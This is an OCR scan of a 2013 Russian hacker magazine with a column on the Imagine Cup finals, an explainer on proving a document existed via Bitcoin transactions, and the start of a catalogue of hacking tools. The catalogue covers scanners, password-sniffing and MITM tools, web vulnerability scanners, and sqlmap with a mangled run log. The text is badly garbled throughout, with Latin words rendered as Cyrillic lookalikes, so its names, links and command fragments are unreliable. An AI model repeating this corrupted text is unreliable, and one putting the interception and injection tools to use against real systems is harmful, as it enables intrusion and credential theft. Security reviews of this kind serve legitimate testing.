участвовать, когда был студентом». Черт, кажет- 
ся, только я узнал об этом крупнейшем техноло- 
гическом конкурсе, когда уже окончил бауманку. 
Досадно до сих пор. 

Я не учился конструировать ракеты. И не знаю, 
как делается шунтирование сердца. Но мне всег- 
да искренне хотелось использовать знания ин- 
формационных технологий, чтобы сделать этот 
мир чуточку лучше. Ітадіпе Сир, который прово- 
дится при поддержке МісгозоТІ:, как раз такую воз- 
можность дает и бросает вызов: «Вот вам техно- 
логии, вот вам мир, полный проблем, — сделайте 
что-нибудь, что может этот мир изменить». И сту- 
денты делают! 

МЕНЯТЬМИР 

Рядом со стендом стоит человек в костюме по- 
жарного. Это парень из Бельгии демонстрирует, 
как он с однокурсниками реализовал систему 
навигации внутри здания (СРЗ там, понятное 
дело, не работает), чтобы пожарный, зашедший 
в задымленное здание, всегда мог найти путь 
назад. Перемещения записываются с помощью 
нескольких акселерометров, вшитых в костюм, 
а маршрут для возвращения выводится через 
специальные очки с экраном. Собранные данные 
с костюмов передаются на командный пульт. Если 
что-то пойдет не так, то к любому могут сразу на- 
править помощь. Примечательно, что этот про- 
тотип уже используется в некоторых бельгийских 
пожарных частях. 

Сельское хозяйство — то место, где есть ко- 
лоссальный простор для внедрения умных си- 
стем. Веселые ребята из Словении показали, 
как они собираются увеличить производитель- 
ность пчелиных ульев. К каждому улью под- 
ключается видеокамера и огромное количество 
датчиков, с которых информация собирается 



и агрегируется на специальном базИЬоагсГе. Это 
позволяет оптимизировать схему сбора меда, 
а также, к примеру, влиять на условия внутри 
улья. Оказывается, пчелы плохо переносят сухой 
воздух, поэтому система может удаленно вклю- 
чать специальный опрыскиватель, чтобы пчелам 
было хорошо и они делали правильный мед. Вы- 
глядит это уже даже не как прототип, а как рабо- 
чее решение. Недаром недавно про их проект 
Веегіпда писал ТесІіСгипсІі — ребята уже ждут 
инвестиций. 

Команда из Ливана сделала ргооТ-оТ-сопсер* 
системы авторизации, которая проверяет не толь- 
ко правильность пароля, но и то, как он вводится. 
Идея простая: каждый человек набирает пароль 
по-разному, с индивидуальной скоростью, с раз- 
личными паузами между символами. Соответ- 
ственно, простая нейронная сеть после недолгого 
обучения может с большой долей вероятности 
сказать, вводит ли пароль настоящий пользова- 
тель или чужак, у которого оказался пароль. Про- 
верил на себе — работает :). 

ФИНАЛ В РОССИИ 

Впервые за десять лет существования конкурса 
международный финал проходил в России — 
в Санкт-Петербурге (буквально через неделю по- 
сле финала АСМ ІСРС). Причем выставка проек- 
тов в этот раз была доступна не только для жюри, 
но и для всех желающих, где я с удовольствием 
и пообщался с командами. 

Россию в мировом финале представляли сра- 
зу три команды: Сезіз, разработавшая систему 
на основе сенсора Кіпесі для реабилитации детей 
с заболеваниями центральной нервной системы 
и опорно-двигательного аппарата, Ой! оТ Тосиз 
с системой Кіпесі: Мадіс для создания инноваци- 
онных презентаций и спектаклей и ОиасІ Эатаде 
с игрой ЬазегсгаТІ:, использующей ѴѴіпсІоѵѵз РНопе 
и специализированное устройство с инфракрас- 
ной пушкой и жилетом для создания подвижных 




КОЛОНКА 

СТЁПЫ 

ИЛЬИНА 



игр в городской среде. Увы, никому из них взять 
награды не удалось. Однако это не означает, 
что сами проекты были плохими. Для победы 
нужно грамотно презентовать свою идею жюри, 
а с этим тоже справляется не каждый. Кстати, 
в жюри в этом году входил создатель «Тетриса» 
Алексей Пажитнов. Я ехал с этим приятнейшим 
человеком в автобусе, а с кем разговаривал, уз- 
нал уже на церемонии награждения, когда он на- 
зывал победителей в номинации «Игры». Каюсь: 
это мой личный позор! 

Отмечу некоторых победителей. В катего- 
рии «Инновации» победила команда из Велико- 
британии СоІіпкесІ с проектом ЗоипсІЗѴІЧК — это 
приложение связывает мобильные телефоны 
при помощи технологии ВІиеІооІН и позволяет им 
синхронно воспроизводить одну и ту же песню, 
создавая эффект симфонии. В категории «Соци- 
альные проекты» победил проект португальской 
команды Рога ВейегѴѴогісІ — экономичный порта- 
тивный образец, способный спасти жизнь людям, 
которым требуется переливание крови при не- 
счастном случае, за пять минут определяя группу 
крови пациента. А второе место в этой же катего- 
рии заняли ребята из Тайваня с проектом Оплпі- 
Неагіпд Зоіийоп, которое использует ѴѴіпсІоѵѵз 
РНопе как устройство обработки звука, позволя- 
ющее с помощью индивидуального частотного 
фильтра улучшить слышимость для людей с пло- 
хим слухом. 

Команды -победители получили призы в раз- 
мере 50, 10 и 5 тысяч долларов США за первое, 
второе и третье место соответственно. Многие 
участники также получили ряд специальных спон- 
сорских наград. Чтобы понимать масштаб: весь 
призовой фонд превышал миллион долларов. 
Сама церемония была на уровне лучших запад- 
ных мероприятий (я их видел немало), а вел ее 
звезда сериала «Доктор Кто» Мэтт Смит (наде- 
юсь, это имя тебе говорит больше, чем мне :)). 
Короче говоря, Ітадіпе Сир — это круто! ШИ 
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РгооТ-оТ-Сопсері 

ЗАВЕРЯЕМ ДОКУМЕНТЫ С ПОМОЩЬЮ ЦЕПОЧКИ 
ТРАНЗАКЦИЙ ВІТСОІЫ 



ЧТО ЭТО ТАКОЕ 

Инфраструктура Віісоіп устроена таким образом, 
что в общественном архиве сохраняются все 
транзакции: адреса кошельков и метки времени. 
Подделать информацию в архиве транзакций 
невозможно, потому что копия архива хранится 
на десятках тысяч компьютеров в распределен- 
ной Р2Р-сети и доступна для просмотра через 
Ыосксііаіп.іпіо или другие интерфейсы. 

Каждый адрес Віісоіп — это хеш ВІРЕІѴЮ-160 
от хеша ЗНА-256 от публичной части пары клю- 
чей ЕІІірйс Сигѵе йЗА (ЕСйЗА). 160 бит хеша с 40 
битами служебной информации конвертируются 
из Вазе256 в Вазе58, после чего и получаются 
привычные адреса вроде 161І\л/І_І_9ВізсЗОТРдВІІѵ 
КоТНгпВ07\л/Мф/М. Каждая транзакция содержит 
адрес отправителя и адрес получателя, то есть 
320 бит информации. 

Зная алгоритм генерации адреса Віісоіп ( Ьіі. 
ІѴ/15МНГІМП ). мы можем внедрить свою инфор- 
мацию в адрес Віісоіп, а также извлечь ее по- 
том обратно, выполнив обратную конвертацию 
из Вазе58 в Вазе256. Когда же мы осуществим 
транзакцию между двумя кошельками, то 320 бит 
(40 байт) информации навсегда будет записано 
в анналы истории, то есть в цепочку транзакций 
Віісоіп. 

ЗАЧЕМ ЭТО НУЖНО 

Как уже было сказано, подделать данные в це- 
почке транзакций Віісоіп технически невозмож- 
но. Поместив туда информацию о каком-то до- 
кументе, мы тем самым получаем неоспоримое 
доказательство существования документа кон- 
кретного содержания в конкретный момент. 

Естественно, в 40 байт не поместится ника- 
кой осмысленный документ, но это и не нужно. 
Достаточно рассчитать хеш-функцию от этого 
документа, что обеспечит криптографически под- 
крепленные доказательства самого факта его 
существования, не раскрывая при этом содер- 
жимое документа. Рассчитать 256-битную хеш- 
функцию можно от файла любого размера, на- 
пример от архива научных чертежей в несколько 
гигабайт или от текстового документа с подроб- 
ным описанием изобретения. 

Віісоіп здесь выступает в роли безопасной, 
надежной и почти бесплатной нотариальной кон- 
торы, от которой заверенные документы должен 
принять любой суд (по крайней мере, заслушав 
мнение технического эксперта, который объяс- 
нит, что подделать такого рода доказательства 
невозможно). Можно таким образом сохранять 
улики для будущих судебных заседаний: скрин- 
шоты сайтов, исходные тексты программ, ори- 
гиналы фотографий и так далее. «Нотариальная 
контора» заверит любой документ в цифровой 
форме. 

Единственный недостаток в том, что Віісоіп 
не подтверждает имя автора, который разме- 
стил хеш в цепочке, ведь это псевдоанонимная 
система. 



КАК ЭТО РАБОТАЕТ 

Недавно в Сети начал работу новый сайт «До- 
казательство существования» ( ргооіоіехізіапсе. 
сот ) и некоторые другие проекты, реализую- 
щие на практике эту концепцию. Закачиваешь 
на сайт документ, он хешируется функцией ЗНА- 
256. Затем хеш разбивается на две половины, 
каждая из которых используется вместо хеша 
ВІРЕМй-160 от публичного ключа в алгоритме 
генерации адреса Віісоіп (см. рисунок). Недоста- 
ющие 32 байта (160 - 256/2) в одной из частей за- 
биваются нулями. После конвертации из Вазе256 
в Вазе58 мы получаем два адреса, каждый из ко- 
торых содержит половину хеша от документа. 
Осталось совершить транзакцию между этими 
адресами, чтобы навсегда сохранить хеш в це- 
почке транзакций. 



За свои услуги сайт «Доказательство суще- 
ствования» берет 0,005 ВТС, но ты можешь сде- 
лать работу самостоятельно, если посчитаешь 
хеш от документа, разделишь его пополам и сам 
сгенерируешь два 160-битных адреса с половина- 
ми хеша. Минимальный размер транзакции в сети 
Віісоіп на сегодняшний день составляет 0,0000001 
ВТС, то есть примерно 0,032 копейки. Именно в та- 
кую сумму обойдется тебе создание нотариально 
заверенной копии в цепочке транзакций Віісоіп. 

Кроме ргоо^ехізіапсе.сот, есть и дру- 
гие бесплатные сервисы для простановки ме- 
ток времени на хеши, в том числе СТігопоЬИ: 
( аіШиЬ.сот/аоЫіп/сІігопоЬИ ) и Вйпоіаг ( аіШиЬ. 
сот/ЬіісоіпаизІгіа/ЫіпоІж ). Есть и коммер- 
ческие платные сервисы, например СиагсШте 
( аиагсШте.сот ) и Зигеіу ( зигеіѵ.сот ). НЕ 



Алгоритм преобра- 
зования публичного 
ключа ЕС05А в адрес 
Віісоіп 



Конвертация публичного ключа 
ЕІІірІіс-Сигѵе ЭЗА в адрес ВТС 




При стандартной конвертации байт 0x00 слева не имеет значения (как запись 052 
вместо 52), но в сети ВТС крайние слева нули проходят через конвертер. Так что 
вместо каждого байта 0x00 мы добавляем «1 » в левой части адреса Вазе58. 

Вот почему адреса в основной сети всегда начинаются с единиц. 







1ѴАІШШС 



Вся информация предоставлена исключительно 
в ознакомительных целях. Ни редакция, ни автор 
не несут ответственности за любой возможный 
вред, причиненный материалами данной статьи. 







ш штш, 



программ для хакера , 
которые рекомендуют 
известные и/Нііе Наі'ы 

России 



Когда-то давно, а точнее, шесть лет назад в юбилейном со- 
том номере у нас была большая подборка наиболее востре- 
бованных хакерских утилит. С того времени много воды утек- 
ло, многое поменялось и в области безопасности: появились 
свежие техники взлома, новые инструменты, новые сложные 
задачи. Одни тулзы до сих пор продолжают развиваться и ак- 
тивно используются, другие канули в Лету. Вот мы и решили 
посмотреть, насколько наша отрасль изменилась за это время, 
на примере зесигИу-утилит. Пригласили в качестве экспертов 
наших постоянных авторов, друзей журнала, друзей друзей, ко- 
роче — кучу компетентных людей. И замутили свежую подборку 
хакерских утилит. Что из этого вышло — смотри сам. 







ХАКЕР 08 / 175 / 2013 



100 программ для хакера 



'5 



СЕТЕВЫЕ 

СКАНЕРЫ 

Если и начинать эту подборку, то только с них. 
Сетевые сканеры используют скрипткидис для 
своих шалостей. Но и любой серьезный пентест 
не обходится без детального сканирования сети. 
А открывает этот обзор программа-легенда. 




- 002 ^ 

АГІСПѴІР8СА№ЕП 

із.дсІ/ѴдеОаК 




005 

ЫВТ8САН 

із.дсІДМдІЕѴ 



001 



ЫМАР 

із.дсІ/еЭпгиОО 

Чем еще могла пользоваться Тринити в «Матрице», если не 
Ытар'ом? Этот инструмент настолько прочно стал ассоци- 
ироваться с хакерством, что другого выбора у режиссеров 
просто не было. Практически любое исследование сети или 
удаленного хоста начинается именно с запуска ІЧплар. И не- 
даром — утилита использует множество различных методов 
сканирования: ІЮР, ТСР (соппесі:), ТСР 5ѴІЧ (полуоткрытое) 
и другие. Позволяет с помощью отпечатка стека ТСР/ІР 
с большой долей вероятности определить ОС на удаленном 
хосте, производить «невидимое» сканирование. Имеет соб- 
ственный скриптовый движок ІЧтар Зсгірѣіпд Епдіпе, позво- 
ляющий создавать собственные расширения на языке І_иа. 
Исследователь НЮ Мооге, известный как автор Меіазріоіі, 
недавно опубликовал статью о том, как, используя скрипты 
для Ыплар, он просканировал весь интернет (да, все ІРѵ4- 
адреса!) в поисках открытых портов, и сколько раз ему за 
это угрожали удивленные подобным вниманием админы :). 



іептар (к-ио системен администратор) 
5 с ап Тсоіі РгоГіІе Наір 



Ілгдгі рЁ-іГгечік пеі 



V РгпШс ІІПІЕГ 



~Р1 М К*" 



Сопѵтипгі: |плѵір Т4 А ѵ рс Ггеак.пвЕ 



Мшар Оілриі | Реги / н«и Тороіоду нрі* Сияй* зсап* 



птар т Т4 ’А -т рс’ігык.гиі 



Сеівіи 



ГіЯ-1 | 

йііѵиір глт -. 4 імРі 164 ЩМ ѳчдірі .<мно-вмірек..в* п 

ІЩСК=АІЗА’кИиО=6) 1Ё[И=Н] 



ЯсІтгог Е Р іаіапсс; 2 Нор» 

БеГУІСС ГпГо: Но$і;; тоЦ.рс *пеак.пеГ; 
I іпни; СРГ: срв:/о:1 ігштг :квтиІ 



ТРАСЕ ИОЛЕ [изіпд рагг Э98/ІСР) 

НОР КП ДЮЯЕЗЗ 

1 7.19 т& 193. 160.7.1 

2 3.24 та рс Ггмк.пві (83. 22В. 93. 7б) 

Нкі : Зсгірі Роаі -иСаПпіІпв. 

ІлШвШ| N56 а* 1ѲЕІ1 

Сатр1вГв8 К5Г ас ]Я:11, 0.ѲВя підряскгі 

ЙСЯ0 ііаій ГІІН ГГСИ! /и$г/5іп/, «/эЬдгв/птдр 

05 д?И Загудев гіпТвсІівп рпг Шестой. гвро-гТ 

япу ІпСоггнсІ гнгиіін я г Ы Ер2//птар.огді/5іД]т11/ . 
НИ ніопрі Ті ГР дРгігп!>5 (Т Ьр5і ир) ясаппгагі іп 
161 .36 иесатків 

Ялм рбскаів 5в«ГЕ 2265 (ИѴ7.ЭДОФ] ( 
Исѵгі: 7й (В.?1бКВ> 



Инструмент для супербыстро- 
го сканирования диапазонов 
ІР-адресов в сети. Прога пингует 
каждый айпишник на проверку его 
жизнеспособности и затем опцио- 
нально получает имя хоста, МАС- 
адрес, список открытых портов и 
т. п. Функционал можно расширить 
с помощью плагинов на ^ѵа. 




— 003 ^ 

ІЖІСОПЫ5САЫ 

із.дсІ/2арѴіХ 

Анализируя приходящие ответы, 
этот сканер может как в пассивном, 
так и в активном режиме идентифи- 
цировать ОС и сервисы на удален- 
ном хосте. При этом работает очень 
шустро, за что и прижился у многих 
людей. Весь проходящий трафик 
можно логировать в рсар-файл для 
дальнейшего анализа. 




— 004 — 

ІКЕ-ЗСАЫ 

із.дсІ/ѵІіСѵНС 

Одна из немногих утилит, которая 
детектирует ѴРЫ. Распознавание 
основано на посылке специального 
ІКЕ-пакета на каждую машину в 
сети. Большинство хостов, исполь- 
зующих ѴРЫ, отконфигурировано 
таким образом, что в ответ на такой 
пакет отошлют характерный ответ. 



Эта крохотная утилита умеет 
делать только одно — сканировать 
диапазон ІР-адресов и извлекать 
всю ІЧеШЮЗ-информацию (имя 
компьютера, имя активного аккаун- 
та и М АС-адрес), что полезно для 
быстрого поиска всех расшаренных 
ресурсов в сети. По сути, продви- 
нутая версия стандартной пЫзІаІ. 




- 006 ^ 
ТНСАМАР 

із.дсІ/ІтІІѴВР 

Чтобы скрыть потенциально 
уязвимые сервисы, админы часто 
устанавливают их на нестандарт- 
ные порты. Иногда это действи- 
тельно помогает. Однако ТНС Аплар 
использует техники Тіпдегргіпйпд'а, 
считывая ответы сервиса, чтобы 
идентифицировать его, независимо 
от порта, на котором он отвечает. 



[ 1.2.3. 4/1524 
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РОР 

із.дсІ/ІМКкіМ 

Пассивное средство для опреде- 
ления операционной системы на 
удаленном хосте. Помимо этого, 
рОІ определяет присутствие файр- 
вола, использование ІЧАТ и другую 
полезную информацию, которая 
может пригодиться для удаленного 
изучения чужой системы. 





іб 



СОѴЕПЗТОЯѴ 
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СНИФФЕРЫ 

Отснифать трафик и изменять его на лету, пере- 
хватить логины/пароли, провернув МІТМ-атаку, 
да и просто отладить сетевое приложение — все 
это было бы невозможно без следующих 
инструментов. 




ШТЕПСЕРТЕП-І1С 

із.дс1/к40геѵ 

Сниффер Іпіегсеріег. Отечественная разработка. Пожалуй, 
самый продвинутый перехватчик, заточенный на сниффинг 
паролей/хешей, сообщений популярных мессенджеров и 
других ценных данных. Главной отличительной особенно- 
стью является эксклюзивный набор реализованных в про- 
грамме МІТМ-атак (ЗЗН МіТМ, ЗМВ Щаск), для проведения 
которых без Іпіегсеріег'а потребовался бы целый арсенал 
утилит. Іпіегсеріег позволяет просмотреть весь трафик в 
чистом (гаѵѵ) виде, функционируя аналогично ѴѴігезІіагк'у. 
И способна захватывать трафик удаленно разными спо- 
собами (например, посредством ВРСАР-демона). Поми- 
мо основной версии для ѴѴіпсІоѵѵз, существует консоль- 
ная сборка с псевдографическим интерфейсом на базе 
псигзез и отдельная нативная версия под АпсІгоісІ с іоисіі- 
интерфейсом. А еще не так давно мы включали эту про- 
грамму в подборку лучших хак-тулз для іРНопе/іРаб. 



О ІгЛегсер*ег-М6 0.9.1 
г Меіѵюгк Асіаріег 




і-ЗІгеатРІИег— 
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РаскеЪ: 180928 (92.67МЬ) РагеесІ: 178116 |МАС: 44-87-РС-73-62-4Е |Сиггеп6 тосіе: КАѴѴ 
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ОТШЕ8НАКК 

із.дсІ/Оо7иі4 

Фантастически успешный сниффер 
и анализатор дампов трафика. 
Работает в любых сетях (не только 
ЕШегпеІ:) и знает почти все популяр- 
ные протоколы. Утилита автоматиче- 
ски разбирает пакеты в соответ- 
ствии с протоколом и представляет 
данные в виде понятных полей, 
позволяя использовать фильтры. 



МЕТѴѴОНКМШЕП 

із.дсі/АХ7МНВ 

Один из лучших инструментов для 
анализа перехваченных данных, 
сохраненных в формате РСАР Ути- 
лита пассивно анализирует дамп с 
трафиком, определяет участников 
обмена сетевыми данными, рас- 
познает операционные системы 
на каждом из хостов, извлекает из 
дампа переданные файлы. 
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ЕТТЕВСАР 

із.дсІ/МНМТх 

Этот сниффер поддерживает 
активный и пассивный анализ 
множества протоколов (в том числе 
шифрованных, например 35Н и 
НТТРЗ). Утилита поддерживает 
сниффинг в реальном времени, 
фильтрацию контента на лету, 
инжекцию пакетов и многие другие 
интересные возможности. 




** 013 в 

ЫСВЕР 

із.дсІ/4І_і1Е{ 

Что такое ІЧдгер? Берем известную 
никсовую утилиту дгер и натравли- 
ваем ее на сетевой трафик. Утилита 
позволяет выделить из перехвачен- 
ного трафика любые данные, отве- 
чающие регулярным выражениям. 
Традиционно пдгер используется 
для анализа текстовых протоколов, 
вроде НТТР, 8МТР, РТР и так далее. 




- 011 - 

ТСРОІШР 

із.дсІ/дІ\ІЬоОР 

Классический сниффер, который 
входит в состав любой *піх систе- 
мы. Главная фишка в том, что он 
может использоваться в качестве 
универсального решения для са- 
мых разных задач. Например, мож- 
но буквально в одну строку сделать 
полноценный сниффер паролей. 



-014 - 

88І.ЗТШР 

із.дсІ/5Вріѵс 

Утилита реализует технику пере- 
хвата ЗЗЬсоединений. Вся соль 
атаки в том, что собственно 55І_- 
соединение никто и не атакует. 

С помощью обычной МІТМ -атаки 
тулза внедряется между пользова- 
телем и веб-сервером и работает 
как обычный прокси. 








ХАКЕР 08 /175/ 2013 



100 программ для хакера 



поиск 

УЯЗВИМОСТЕЙ 

Если знаешь, где искать уязвимость, то этот про- 
цесс можно автоматизировать. Или по меньшей 
мере упростить себе жизнь с помощью прове- 
ренных вспомогательных инструментов. 







В1ЖР8ШТЕ 

із.дсІ/ЗѵНбѴа 

По сути, это не одна утилита, а целый комплекс про- 
грамм, которым пользуется практически каждый, кто 
ищет уязвимости в веб-приложениях. Самая главная 
часть тулкита — Вигр Ргоху, которая перехватывает НТТР/ 
НТТРЗ-трафик браузера и позволяет с помощью других 
утилит выполнять с данными различные действия. Дан- 
ный инструмент — это швейцарский нож в руках опытного 
пользователя. Ведь возможность перехвата и модифи- 
кации веб-запросов/ответов на лету — это то, что нужно 
при поиске багов. Кроме того, можно упростить большую 
часть работы, используя фичи тулзы, а учитывая, что часть 
работы можно автоматизировать с помощью Заѵа, РуШоп 
или ВиЬу, то этот инструмент становится мощным и гроз- 
ным оружием. 





-016- 

РІІ220В 

із.дсІ/ВІрт8В 

Фаззинг-набор каждого уважаю- 
щего себя веб-хакера. Включает 
множество словарей для подбора 
вкусных путей (собранных во время 
пентестов), полезные шаблоны 
атак и коллекцию веб-шеллов под 
множество платформ. По сути 
тулза — это набор текстовых фай- 
лов, которые можно использовать 
в любом сканере уязвимостей, 
даже в самописном. Наиболее 
«хлебно» юзать ВиггОВ вкупе с 
Вигр Іпітисіег, компонентом бурпа 
для проведения кастомных атак на 
веб-приложения. 



ф 0*АЗ> Л***» И-ЯС1 АінМІЬ", 8.01. 
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ОІВВЦ8ТЕВ 

І5,дсІ/к27ИѴК 

Бесплатная многопоточная тулза 
для поиска незалинкованного 
контента в структуре сайта/прило- 
жения. Благодаря ей иногда можно 
найти бэкапы сайта с конфигами 
и паролями, а то и полной базой 
данных или тестовые скрипты, в 
которых обычно не следят за без- 
опасностью. Лучше всего работать 
по своим собственным словарям, 
так как некоторые компании, напри- 
мер Яндекс, фильтруют запросы 
по стандартным. Некоторые иссле- 
дователи вместо нее используют 
возможности Рго-версии Вигр. 



*7 
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АСІЖЕТІХѴѴѴ5 

із.дсІ/ЭѴѴпггіМе 



Этот сканер уязвимостей платный, 
но пользуется бешеной популярно- 
стью. Одна из опций — АсиЗепзог 
— позволяет провести намного 
более глубокое тестирование при 
условии, что у тебя на руках есть 
исходники приложения, совмещая 
ЫаскЬох и \л/Ы1:еЬох подходы. 




ѴѴЗАР 

Ссылка на сайт 



Фреймворк для тестирования без- 
опасности веб-приложений. Бата- 
рейки ѵѵЗаІ 1 — это его расширения! 
Сейчас в проект включены более 
130 аддонов, реализующие провер- 
ки и эксплуатацию ЗОЬинъекций, 
Х88, локальный и удаленные инклу- 
ды и многое другое. 



Вооіеап Ва.чссі ЗСД. 




Китпг 



-4020 - 

ЫЕТ5РАПКЕП 

із.дсІ/сІіВсѴЗ 

Одна из ведущих коммерческих 
разработок для поиска и эксплуати- 
рования широкого круга уязвимо- 
стей в веб-приложениях. Имеет 
бесплатную версию, позволяющую 
оценить возможности сканера 
любому желающему, которой грех 
не воспользоваться. 





СОѴЕПЗТОЙѴ 
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ЫЕХРОЗЕ 

із.дсІ/ОЦУІІІЭ 

Этот сканер легко интегрируется с 
Меіазріоіі'ом. Такой шаг позволяет 
объединить мощь обоих инстру- 
ментов воедино. Простой пример: 
найти компьютеры с определенной 
уязвимостью и тут же эксплуатиро- 
вать ее с помощью соответствую- 
щего модуля Меіазріоіі — получа- 
ется авторутинг на новом уровне. 




- 022 - 

Г1ІКТ02 

із.дсІ/ОООсІдд 

Мощный инструмент, способный 
эффективно сканировать удален- 
ные хосты и проводить сложные те- 
сты безопасности. В базе програм- 
мы имеется информация о более 
чем 3200 уязвимых веб-сценариев, 
а также 625 веб-демонов. Анти-ЮЗ 
методы — это еще одна интересная 
фишка N і кѣо . 
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АРР8САЫ 

із.дсі/Х5І2иХ 

А это уже тяжелая артиллерия от 
ІВМ. На выходе после сканиро- 
вания ты получаешь отчет о про- 
деланной работе паука, воссоз- 
дающего структуру сайта, а также 
информацию о потенциальных 
брешах в безопасности (ЗОІ_і, Х85, 
нуль-байт, скрытые манипуляции с 
полем, переполнение буфера). 



ѴѴРІІ22 

із.дсѴ^аЛэИ 

Очень гибкий инструмент для 
анализа веб-приложений. Может 
быть использован для поиска не- 
пролинкованных ресурсов (таких 
как каталоги, скрипты и так далее), 
поиска различных видов инъекций 
(50І_, Х83, ЮАР), проверки пара- 
метров веб-форм (Іодіп/раззѵѵогсІ) 
и так далее. 




- 025 - 

ѴѴЕВ8ЕСІЖІТѴ 

із.дсІ/сІдиЭІІ 

Еще один фреймворк для поиска 
уязвимостей в веб-приложениях, 
который давно развивается и 
сейчас перевоплотился в онлайн- 
сервис. Для использования нужно 
зарегистрироваться на сайте и 
получить бесплатный (но ограни- 
ченный в возможностях) аккаунт. 



Тик кор» в*** 



И Э ® «I | 




п»ропгоо«»іг ^ 

ЙКОП ХЮ60П714МС \ \* 
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ЫЕ851І8 

із-дй/пОНШС 

Один из самых известных сканеров 
безопасности. Плагины — ключевая 
особенность архитектуры данного 
приложения. Любой тест на про- 
никновение не зашивается внутрь 
программы, а оформляется в виде 
подключаемого модуля. Аддоны 
распределяются на 42 различных 
типа на любой случай жизни! 



ОРЕЫѴАЗ 

із.дсІ/ІдТеІН 

Форк известного сканера безопас- 
ности Ыеззиз, который унаследовал 
от своего старшего брата клиент- 
серверную архитектуру. Сервер 
работает только под никсами, 
клиентская же часть доступна и для 
винды. База содержит более 30 000 
тестов и постоянно обновляется. 



!*'• уі« 

м г і иіфіо 1 1 р«<) 1 а - і)е I ор : - /Ое 
гаіргеху ѵегзіол і.М-Ьеіа Ьу 
/ш рго»у: іпѵаііо ориеп 
им»*- ./гмргоку I •« ІодШ 
«:роп | | хитина] асасихС 
м I 09111* мгИе ге*о 
•ѵ Іо^віг • ыгіте ИТТР 
р роп • Пип оп 

4 йоміп маіууа ге 
Р №к(:рогІ и&е ириге 
•г - ассер* гее 

— 028 — 

ПАТРПОХѴ 

із.дсІ/МТВІпЗ 

Основное преимущество Пафгоху 
перед другими сканерами за- 
ключается в том, что он является 
пассивным и не генерирует трафик. 
Этот подход не дает излишней на- 
грузки на серверы и не затрудняет 
работу установленных приложений. 
Вафгоху просто изучает коды и вы- 
деляет проблемные фрагменты. 




Сга\ѵ1 гекиИ.ч - сіісі 



ѴѴ Ыір:/ / фіПІ.фіІ 

ПлаитапІ Уѵпа т>а 
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ЗКІРГІЗН 

із.дсІ/сѵЗуРс 

ЗкірТізИ выполняет рекурсивный 
анализ веб-приложения и его 
проверку на базе словаря, после 
чего составляет карту сайта, 
снабженную комментариями 
об обнаруженных уязвимостях. 
Примечательно, что разработка 
инструмента ведется внутри ком- 
пании Соодіе. 




- 030 - 

ОТАРІТІ 

із.дсІ/ХХЕ5уА 

Прога анализирует структуру сайта 
и ищет доступные сценарии, после 
чего составляет список параметров 
для проверки и включает на всю 
катушку свой фаззер. И продолжает 
тщательную проверку до тех пор, 
пока все уязвимые скрипты не будут 
найдены. Качество скана неплохое, 
хотя проект уже не поддерживается. 




- 031 - 

СРІ ЬАЫСЦАВО 

ЬіЕІу/10п\л/и8Э 

Сканер безопасности, работающий 
под виндой. Определив все маши- 
ны в сети, І_АМдиагсІ пытается вы- 
яснить установленную на каждую из 
них ось, отсутствующие заплатки, 
активные точки доступа, расшарен- 
ные ресурсы, запущенные сервисы, 
слабые пароли и т. д., и т. п. Полу- 
чается экспресс-анализ локалки. 




- 032 - 

КЕТША 

із.дсІ/ЭспІіѵѵЗ 

Легендарный сканер уязвимостей 
от известной группы еЕуе. Продукт 
громоздкий и дорогой, однако с 
офсайта можно взять бесплатную 
демоверсию и посмотреть, как 
выглядит сканер безопасности, 
разработка которого началась еще 
в 1998 году. 
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ИНЪЕКЦИИ 



Наѵу - Айѵапсегі ЗОІ_ Ігуесйоп ТооІ 




Ѵегзіоп 1.16 Рго 
СоругідЬГ © 2009-2012 
Ву гЗсІтОѵЗ 



Этот тип уязвимостей остается одним из самых 
опасных, так как открывает доступ не только к 
базе данных с критической информацией, но и 
зачастую к самой системе. При этом технически 
сложные атаки часто легко автоматизируются. 




80ЫѴІАР 

із.дсІ/КМКРги 

Одна из мощнейших открытых утилит для пентестера, 
которая автоматизирует процесс поиска и эксплуатации 
ЗОІ_-инъекций с целью извлечения данных или захвата уда- 
ленного хоста. Движок для определения ЗОЬуязвимостей 
— пускай и самая важная, но все-таки не единственная 
часть функционала зцітар. Утилита имеет множество 
функций, незаменимых в хозяйстве: автоматическое из- 
влечение данных при разных типах слепых инъекций, брут- 
форс хешей всех известных баз данных, поддержка прямо- 
го подключения к базе данных (без явного использования 
301_-уязвимости), а также удобный шелл для выполнения 
команд. Одной из уникальных возможностей программы 
является использование техники йІЧЗ Оаіа ЕхШгаІіоп для 
получения данных из БД через 0І\І8-запросы. Инструмент 
активно развивается, и в этом большой вклад Миросла- 
ва Штампара, который нередко пишет для ][ и приезжает 
из Хорватии на конференции в России. 



(тазГег) Ьегпагс1о@иЬипГи:~/5дІтар$ руГЬоп здітар.ру - 
ег ЬеГмееп, гап6отса5е,5расе2соттепГ -ѵ 3 

5дІтар/1.Ѳ-с1еѵ-с9ЬЬ(і14 - аиГопаГіс 5(21. іп^есГіоп 
ЬГГр: //здітар.огд 

[!] Іедаі сіізсіаігіег : Ьзаде оГ здітар Гог аГГаскіпд Г 
ГЬе епб изег'з гезропзіЫІіГу Го оЬеу аіі аррІісаЫе 
аЬіІіГу апсі аге поГ гезропзІЫе Гог апу пізизе ог сіат 

[*] зГагГіпд аГ 23:47:32 

[23:47:32] [0ЕВІІС] сіеапіпд ьр сопПдигаГіоп рагатеГе 
[23:47:32] [INР0] ІоасЛпд Гатрег зсгірГ ’ЬеГмееп' 
[23:47:32] [ІМР0] ІоасЛпд Гатрег зсгірГ ' гапсіопсазе ' 
[23:47:32] [ІІЧР0] Іоасііпд Гатрег зсгірГ ' зрасе2сопгпеп 
[23:47:32] [0ЕВІКІ] зеГГіпд ГЬе НТТР ГітеоиГ 
[23:47:32] [ЭЕВІІС] зеГГіпд ГЬе НТТР теГЬогі Го СЕТ 
[23:47:32] [ЭЕВІІС] сгеаГіпд НТТР гедиезГз орепег оЬ]е 
[23:47:32] [ІМР0] ГезГіпд соппесГіоп Го ГЬе ГагдеГ иг 
[23:47:32] [ІІЧР0] ЬеиггзГісз сіеГесГесі меЬ раде сЬагзе 
[23:47:32] [ІИР0] ГезГіпд ІГ ГЬе игі із зГаЫе, ѵѵаіГ 
[23:47:33] [ІМР0] игі із зГаЫе 

[23:47:33] [ІІЧР0] ГезГіпд ІГ СЕТ рагапеГег ' ісі ' із сіу 
[23:47:33] [РАѴІ_0А0] 6001 



Гійр : //ІТ5 есТ е а гл .со гл 
Ы±р : /До ги т . ІГз есГе а т .со т 
ілГо@іГзе<±еат.сот СГіеск Гог ирсІаГе 

□аІаЬвзез: 

Мз5рІ_ ѵѵіГГі еггог 
